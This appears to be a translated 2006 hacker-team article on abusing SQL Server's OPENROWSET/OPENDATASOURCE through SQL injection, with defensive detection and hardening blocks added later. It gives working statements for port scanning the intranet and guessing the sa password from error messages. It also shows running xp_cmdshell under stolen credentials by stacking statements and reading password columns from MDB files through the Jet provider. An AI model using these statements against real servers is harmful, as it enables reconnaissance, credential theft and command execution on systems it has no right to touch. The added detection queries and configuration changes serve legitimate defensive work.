Other OpenRowSet/OpenDataSource techniques
Author: superhei _ [at] _ ph4nt0m.org
Blog: http://superhei.blogbus.com/
Team: http://www.ph4nt0m.org
Date: 2006-04-16
Preface:
You should already be familiar with how OpenRowSet/OpenDataSource are used; the technique in [1] is built on OpenRowSet. In fact, OpenRowSet/OpenDataSource can be used for many more things.
I. Function prototypes, for reference:
OpenRowSet: http://msdn2.microsoft.com/zh-cn/library/ms190312(SQL.90).aspx
OPENROWSET
( { 'provider_name' , { 'datasource' ; 'user_id' ; 'password'
                      | 'provider_string' }
                    , { [ catalog. ] [ schema. ] object
                      | 'query' }
  | BULK 'data_file' ,
        { FORMATFILE = 'format_file_path' [ <bulk_options> ]
        | SINGLE_BLOB | SINGLE_CLOB | SINGLE_NCLOB }
} )
<bulk_options> ::=
    [ , CODEPAGE = { 'ACP' | 'OEM' | 'RAW' | 'code_page' } ]
    [ , ERRORFILE = 'file_name' ]
    [ , FIRSTROW = first_row ]
    [ , LASTROW = last_row ]
    [ , MAXERRORS = maximum_errors ]
    [ , ROWS_PER_BATCH = rows_per_batch ]
OpenDataSource: http://msdn2.microsoft.com/zh-cn/library/ms179856(SQL.90).aspx
OPENDATASOURCE ( provider_name, init_string )
II. Specific uses
[The following uses OpenRowSet as the example]
A. Using the sqloledb provider:
select * from openrowset('sqloledb', 'server=127.0.0.1,1433;uid=aaa;pwd=aaa', 'select @@version')
provider_name: sqloledb
datasource:    server=127.0.0.1,1433
user_id:       uid=aaa
password:      pwd=aaa
query:         select @@version
1. Using the datasource parameter for port (intranet) scanning:
a. Local port scan:
* Port open [yes]:
select * from openrowset('sqloledb', 'server=127.0.0.1,1433;uid=superhei;pwd=', 'select @@version')
Server: Msg 18456, Level 14, State 1, Line 1
Login failed for user 'superhei'.
* Port open [no]:
select * from openrowset('sqloledb', 'server=127.0.0.1,2433;uid=superhei;pwd=', 'select @@version')
Server: Msg 17, Level 16, State 1, Line 1
SQL Server does not exist or access denied.
b. Intranet port scan:
* Port open [yes]:
select * from openrowset('sqloledb', 'server=169.254.155.7,1433;uid=superhei;pwd=', 'select @@version')
Server: Msg 18456, Level 14, State 1, Line 1
Login failed for user 'superhei'.
* Port open [no]:
select * from openrowset('sqloledb', 'server=169.254.155.8,1433;uid=superhei;pwd=', 'select @@version')
Server: Msg 17, Level 16, State 1, Line 1
SQL Server does not exist or access denied.
2. Using user_id/password to guess a user's password:
* Password correct:
select * from openrowset('sqloledb', 'server=127.0.0.1,1433;uid=sa;pwd=100', 'select @@version')
Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation
Personal Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
* Password incorrect:
select * from openrowset('sqloledb', 'server=127.0.0.1,1433;uid=sa;pwd=100', 'select @@version')
Server: Msg 18456, Level 14, State 1, Line 1
Login failed for user 'sa'.
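The defender's counterpart to sections 1 and 2, added here as an example and not part of the original article: the scan and the password guesses are ordinary OPENROWSET statements issued through the web application's login, so on SQL Server 2005 and later their text is visible in the plan cache and, while a scan sits on a connection timeout for a closed host, in sys.dm_exec_requests together with the session that issued it. The queries assume those system views exist; the last query is the SQL Server 2000 variant (the version in the output above) and uses master..syscacheobjects instead. Note also that the outbound connections, and the 18456 failed logins they cause on the target, originate from the database server itself rather than from the web client, so the target's logs will point at the SQL Server host.

```sql
-- Added example (not from the original article): finding ad hoc
-- distributed queries that ran through this instance.

-- 1. Cached plans whose text calls OPENROWSET/OPENDATASOURCE; the
--    connection string (target host, port, login) is in the text.
--    Requires SQL Server 2005 or later.
SELECT cp.usecounts,
       cp.objtype,
       st.text AS query_text
FROM   sys.dm_exec_cached_plans AS cp
CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) AS st
WHERE  st.text LIKE '%OPENROWSET%'
   OR  st.text LIKE '%OPENDATASOURCE%'
ORDER BY cp.usecounts DESC;

-- 2. Such statements currently executing, with the login and client
--    host that issued them. A scan of a closed or filtered address
--    blocks on the provider's connection timeout, so it shows up here
--    while it runs. Requires SQL Server 2005 or later.
SELECT r.session_id,
       s.login_name,
       s.host_name,
       r.start_time,
       st.text AS query_text
FROM   sys.dm_exec_requests AS r
JOIN   sys.dm_exec_sessions AS s ON s.session_id = r.session_id
CROSS APPLY sys.dm_exec_sql_text(r.sql_handle) AS st
WHERE  st.text LIKE '%OPENROWSET%'
   OR  st.text LIKE '%OPENDATASOURCE%';

-- 3. SQL Server 2000: the plan cache is exposed through the
--    syscacheobjects table in master.
SELECT usecounts, sql
FROM   master..syscacheobjects
WHERE  sql LIKE '%OPENROWSET%'
   OR  sql LIKE '%OPENDATASOURCE%';
```

Statements that fail before a plan is compiled leave nothing in the cache, so the plan-cache queries are a starting point, not a complete record; the requests view and the target hosts' own failed-login records fill the gap.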
3. Executing SQL statements as another user
If the permissions of the login the web application connects with are too low (for example, public), and the method above has been used to obtain the password of sa or another dbo user, we can execute SQL statements as that user through the injection [cross-user execution].
Let's test:
select * from openrowset('sqloledb', 'server=127.0.0.1,1433;uid=sa;pwd=100', 'exec master.dbo.xp_cmdshell [dir]')
Server: Msg 7357, Level 16, State 2, Line 1
Could not process object 'exec master.dbo.xp_cmdshell [dir]'. The OLE DB provider 'SQLOLEDB' indicates that the object has no columns.
Hmm ~~, it failed: no columns. We can get around this with multiple statements:
select * from openrowset('sqloledb', 'server=127.0.0.1,1433;uid=sa;pwd=100', 'select user; exec master.dbo.xp_cmdshell [dir > c:/test.txt]')
The result of select user is returned, and test.txt can be found on the C drive: exec master.dbo.xp_cmdshell [dir > c:/test.txt] ran successfully.
B. Using Microsoft OLE DB Provider for Jet and other providers.
select f_name, f_password from openrowset('Microsoft.Jet.OLEDB.4.0', 'd:/LSE/connections/Q.mdb'; 'admin'; '', admin)
[PS: the MDB has no password set; the user is admin and the password is blank]
This returns the data in columns f_name and f_password of table admin in the database D:/LSE/connections/Q.mdb. In this way, SQL injection can be extended to read sensitive data out of an MDB file.
The preceding statement requires the SA permission. It can also be combined with provider vulnerabilities, such as the msjet40.dll overflow, to execute commands.
There is also the trick of using regwrite on the sandbox setting together with select shell() for execution, and so on.
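Every technique in sections A and B depends on ad hoc distributed queries being enabled, and section 3 additionally on xp_cmdshell. The hardening statements below are an added example, not part of the original article, and assume SQL Server 2005 or later, where both are documented sp_configure options. SQL Server 2000, the version shown in the output above, has no such sp_configure option; there the equivalent is the per-provider "Disallow ad hoc accesses" setting (the DisallowAdhocAccess value under the provider's registry key), which is stated here as an assumption to be checked against that version's documentation.

```sql
-- Added example (not from the original article): switching off the
-- features the OPENROWSET/OPENDATASOURCE techniques rely on.
-- Assumes SQL Server 2005 or later.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

-- OPENROWSET / OPENDATASOURCE with an inline connection string,
-- for every provider (sqloledb, Jet, and the rest)
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;

-- The procedure the cross-user example in section 3 ends up calling
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

-- Verify: both rows should report value_in_use = 0.
SELECT name, value_in_use
FROM   sys.configurations
WHERE  name IN ('Ad Hoc Distributed Queries', 'xp_cmdshell');
```

With the option off, the OPENROWSET calls above fail with error 15281 (the component is blocked by configuration) regardless of target host or credentials, so the open/closed port and right/wrong password distinctions are no longer observable through error messages. A login that already holds sysadmin can simply turn the options back on, which is why the low-privilege web login that section 3 tries to work around matters more than either setting, along with restricting outbound connections from the database host to the addresses it legitimately needs.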
4. Using BULK [skipped here; if you are interested, try it yourself]